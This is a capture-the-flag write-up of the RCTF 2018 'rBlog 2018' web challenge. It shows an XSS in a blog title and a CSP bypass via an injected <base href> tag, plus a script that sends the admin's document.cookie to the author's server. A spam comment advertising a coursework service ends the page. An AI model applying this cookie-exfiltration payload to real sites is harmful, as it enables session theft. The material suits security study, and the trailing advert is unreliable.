Tags: xss web csp-bypass
Rating: 5.0
# ▼▼▼rBlog 2018(Web:434pts) solved:27/400=6.8%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
get `document.cookie`
http://rblog.2018.teamrois.cn
```
---
To get document.cookie, execution of script is required.
---
**【Understanding of functions】**
↓
```
About rBlog 2018
Store your secrets here but don't do evil things
Report Abuse
Report to admin who is using latest version of Chrome Stable
```
↓
・There is a function to **upload blog contents(title / contents / style / image)**.
・There is a function to **report to admin**.
---
**【Identify the location of the vulnerability】**
Try sending the request below
↓
```
POST / HTTP/1.1
Host: rblog.2018.teamrois.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2cf9BXkX7RWDsXyP
------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="title"
<>1
------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="content"
<>2
------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="effect"
------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary2cf9BXkX7RWDsXyP--
```
---
I can see the contents with the following request
```
GET /blog.php/79b4463a97b6a4fa223f02e899a4b46b43c9dd32 HTTP/1.1
Host: rblog.2018.teamrois.cn
```
↓
```
HTTP/1.1 200 OK
Date: Mon, 21 May 2018 09:49:16 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.5
Referrer-Policy: strict-origin
X-Frame-Options: DENY
Content-Security-Policy: default-src 'none'; script-src 'nonce-3ae08923a2654e27a3734f7876a5abe0'; frame-src https://www.google.com/recaptcha/; style-src 'self' 'unsafe-inline' fonts.googleapis.com; font-src fonts.gstatic.com; img-src 'self'
Vary: Accept-Encoding
Content-Length: 696
Connection: close
Content-Type: text/html; charset=UTF-8
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="/assets/css/bootstrap.min.css">
<link rel="stylesheet" href="/assets/css/style.css">
<link href="https://fonts.googleapis.com/css?family=Titillium+Web" rel="stylesheet">
<title>rBlog 2018</title>
</head>
<body>
<div class="container mt-5">
<div class="card">
<div class="card-body">
<h2 class="card-title"><>1</h2>
<>2
↓
`<>1`
↓
XSS vulnerability with `title` parameter
---
**【Confirmation of defense mechanism】**
```
X-Frame-Options: DENY
Content-Security-Policy: default-src 'none'; script-src 'nonce-3ae08923a2654e27a3734f7876a5abe0'; frame-src https://www.google.com/recaptcha/; style-src 'self' 'unsafe-inline' fonts.googleapis.com; font-src fonts.gstatic.com; img-src 'self'
```
↓ Check restrictions related to script execution
```
default-src 'none'
script-src 'nonce-3ae08923a2654e27a3734f7876a5abe0';
```
↓
Execution of script is possible in the following form
```
<script src=●●● nonce={random}></script>
```
---
Confirm around XSS.
↓
```
<div class="container mt-5">
<div class="card">
<div class="card-body">
<h2 class="card-title"><>1</h2>
<>2
↓
There is a script tag read in `relative path after XSS`,and `base-uri is not restricted in CSP`.
---
**【exploit】**
1. Create Payload
Insert `<base href ="http://【my_server】/">` in the `title` parameter
↓ Then, the following script behavior is ...
`<script nonce="3ae08923a2654e27a3734f7876a5abe0" src="/assets/js/jquery.min.js"></script>` will access `http://【my_server】/assets/js/jquery.min.js`
---
2. Place the following javascript in `http://【my_server】/assets/js/jquery.min.js`
```
location.href="http://【my_server】?"+document.cookie;
```
---
3. Send Payload to admin
↓
admin has accessed 【my_server】
```
115.159.200.107 - - [20/May/2018:07:02:09 +0000] "GET /?flag=RCTF{why_the_heck_no_mimetype_for_webp_in_apache2_in_8012};%20hint_for_rBlog_Rev.2=http://rblog.2018.teamrois.cn/blog.php/52c533a30d8129ee4915191c57965ef4c7718e6d HTTP/1.1" 200 2261
```
↓
`flag=RCTF{why_the_heck_no_mimetype_for_webp_in_apache2_in_8012}`
This looks like a massive post which needs some refreshing ideas hope we can get more advanced form of details being matched here from here <a href="https://www.courseworkclub.co.uk/">write my coursework</a> have brought such effective idea and thanks for leading me here to this amazing awe-inspiring post which rightly balanced thing to read.